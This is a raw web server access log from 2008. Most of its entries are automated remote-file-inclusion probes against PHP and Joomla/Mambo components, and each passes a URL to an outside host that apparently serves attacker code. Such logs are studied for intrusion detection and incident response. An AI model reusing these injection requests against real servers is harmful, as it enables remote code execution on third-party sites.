72.52.244.232 - - [24/Aug/2008:10:00:37 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.52.244.232 - - [24/Aug/2008:10:00:38 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:01:00 -0700] "GET /logs/access_080226.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:01:00 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:01:01 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.154.65 - - [24/Aug/2008:10:01:02 -0700] "GET /logs/access_080723.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.37.146 - - [24/Aug/2008:10:01:08 -0700] "GET //components-com_facileforms-facileforms-frame-php-html-php-html-components-com_phpshop=http://www.bdc4u.com/logo/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
74.55.37.146 - - [24/Aug/2008:10:01:09 -0700] "GET /logs//components-com_facileforms-facileforms-frame-php-html-php-html-components-com_phpshop=http://www.bdc4u.com/logo/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:01:16 -0700] "GET /logs//components-com_facileforms-facileforms-frame-php-html-php-html-components-com_phpshop=http://www.bdc4u.com/logo/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:01:17 -0700] "GET //components-com_facileforms-facileforms-frame-php-html-php-html-components-com_phpshop=http://www.bdc4u.com/logo/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
212.234.12.71 - - [24/Aug/2008:10:01:28 -0700] "GET /logs/access_080226.log//admin/classes/errors.php?error=http://xwarezx.secretivens.com/idwi.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
86.58.154.237 - - [24/Aug/2008:10:01:41 -0700] "GET /logs/access_080811.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [24/Aug/2008:10:01:42 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 10036 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [24/Aug/2008:10:01:43 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:01:45 -0700] "GET /logs/access_080728.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:01:45 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:01:45 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.184.180 - - [24/Aug/2008:10:01:51 -0700] "GET /logs/?sourcedir=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 200 61999 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
89.111.184.180 - - [24/Aug/2008:10:01:51 -0700] "GET /?sourcedir=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 200 9884 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
72.52.166.106 - - [24/Aug/2008:10:01:56 -0700] "GET /logs/access_080601.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bdc4u.com/logo/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:02:02 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:02:04 -0700] "GET /logs/access_080724.log/index.php?lang=gr&filehttp://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:02:05 -0700] "GET /index.php?lang=gr&filehttp://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 200 9908 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:02:05 -0700] "GET /logs/index.php?lang=gr&filehttp://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.25.179.18 - - [24/Aug/2008:10:02:05 -0700] "GET /logs/access_080811.log///components/com_sef/sef.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
212.25.179.18 - - [24/Aug/2008:10:02:05 -0700] "GET ///components/com_sef/sef.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:10:02:06 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:10:02:06 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:02:09 -0700] "GET /logs/access_080412.log//index.php?sourcedir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:02:10 -0700] "GET //index.php?sourcedir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 200 9930 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:02:11 -0700] "GET /logs//index.php?sourcedir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.25.179.18 - - [24/Aug/2008:10:02:11 -0700] "GET /logs///components/com_sef/sef.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:10:02:18 -0700] "GET /logs/access_080131.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:02:18 -0700] "GET /logs/access_080313.log//index.php?sourcedir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:02:20 -0700] "GET /logs/access_080412.log//index.php?sourcedir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:02:21 -0700] "GET //index.php?sourcedir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 200 9930 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:02:21 -0700] "GET /logs//index.php?sourcedir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.52.244.232 - - [24/Aug/2008:10:02:26 -0700] "GET /logs/access_080723.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:02:38 -0700] "GET /logs/access_080313.log//index.php?sourcedir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:02:39 -0700] "GET /logs/access_080724.log/index.php?lang=gr&filehttp://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:02:40 -0700] "GET /index.php?lang=gr&filehttp://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 200 9908 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:02:41 -0700] "GET /logs/index.php?lang=gr&filehttp://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.52.244.232 - - [24/Aug/2008:10:02:42 -0700] "GET /logs/access_080723.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.137.82 - - [24/Aug/2008:10:02:42 -0700] "GET /logs/access_080601.log%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:02:44 -0700] "GET /logs/access_080412.log//index.php?sourcedir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:02:45 -0700] "GET //index.php?sourcedir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 200 9930 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.57.36 - - [24/Aug/2008:10:02:46 -0700] "GET /logs/access_080711.log//errors.php?error=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.57.36 - - [24/Aug/2008:10:02:47 -0700] "GET //errors.php?error=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:02:47 -0700] "GET /logs//index.php?sourcedir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:10:02:47 -0700] "GET /logs/access_080525.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
85.214.57.36 - - [24/Aug/2008:10:02:47 -0700] "GET /logs//errors.php?error=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.253.195.211 - - [24/Aug/2008:10:02:59 -0700] "GET /logs/access_071121.log HTTP/1.0" 200 61524 "http://www.google.be/search?hl=fr&q=engineering+uml&spell=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; AtHome021SI; SV1; .NET CLR 1.0.3705)" "www.dmulk.com"
209.240.239.2 - - [24/Aug/2008:10:03:03 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.240.239.2 - - [24/Aug/2008:10:03:03 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.100 - - [24/Aug/2008:10:03:05 -0700] "GET /logs/access_080522.log HTTP/1.0" 200 342784 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.25.179.18 - - [24/Aug/2008:10:03:12 -0700] "GET /logs/access_080811.log///components/com_sef/sef.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
212.25.179.18 - - [24/Aug/2008:10:03:12 -0700] "GET /logs///components/com_sef/sef.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
212.25.179.18 - - [24/Aug/2008:10:03:15 -0700] "GET ///components/com_sef/sef.php?mosConfig_absolute_path=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
87.226.77.5 - - [24/Aug/2008:10:03:25 -0700] "GET /logs/access_080510.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
86.58.154.237 - - [24/Aug/2008:10:03:26 -0700] "GET /logs/access_080723.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:03:26 -0700] "GET /logs/access_080313.log//index.php?sourcedir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:10:03:27 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:10:03:28 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:10:03:28 -0700] "GET /show_archives.php?template=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:10:03:28 -0700] "GET /logs/show_archives.php?template=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:10:03:29 -0700] "GET /logs/access_080107.log/show_archives.php?template=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
61.115.228.131 - - [24/Aug/2008:10:03:41 -0700] "GET /logs/access_080306.log//admin/classes/errors.php?error=http://xwarezx.secretivens.com/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.115.228.131 - - [24/Aug/2008:10:03:52 -0700] "GET /logs/access_080504.log//admin/classes/errors.php?error=http://xwarezx.secretivens.com/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:03:53 -0700] "GET /logs/access_080807.log/index.php?lang=gr&filehttp://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:04:37 -0700] "GET /logs/access_080122.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:04:46 -0700] "GET /logs/access_080122.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:04:57 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.248.62.98 - - [24/Aug/2008:10:04:57 -0700] "GET /logs/access_080811.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:04:57 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.248.62.98 - - [24/Aug/2008:10:04:59 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 10036 "-" "libwww-perl/5.65" "www.dmulk.com"
213.248.62.98 - - [24/Aug/2008:10:04:59 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.222.40.244 - - [24/Aug/2008:10:05:02 -0700] "GET /logs/access_080610.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.244 - - [24/Aug/2008:10:05:03 -0700] "GET /logs/access_080530.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:05:08 -0700] "GET /logs/access_080807.log/index.php?lang=gr&filehttp://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.226.176 - - [24/Aug/2008:10:05:08 -0700] "GET /logs/access_080402.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [24/Aug/2008:10:05:09 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [24/Aug/2008:10:05:09 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.139.226 - - [24/Aug/2008:10:05:42 -0700] "GET /logs/access_080803.log/main.php?page=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [24/Aug/2008:10:05:42 -0700] "GET /main.php?page=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [24/Aug/2008:10:05:43 -0700] "GET /logs/main.php?page=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.75.155.204 - - [24/Aug/2008:10:05:45 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.155.204 - - [24/Aug/2008:10:05:46 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.155.204 - - [24/Aug/2008:10:05:46 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:05:49 -0700] "GET /logs/access_080226.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:05:50 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:05:54 -0700] "GET /logs/access_080724.log/index.php?lang=gr&filehttp://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.100 - - [24/Aug/2008:10:05:54 -0700] "GET /bikes/dteel/WeSTOC08/ HTTP/1.0" 200 1245 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:05:55 -0700] "GET /index.php?lang=gr&filehttp://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 200 9908 "-" "libwww-perl/5.805" "www.dmulk.com"
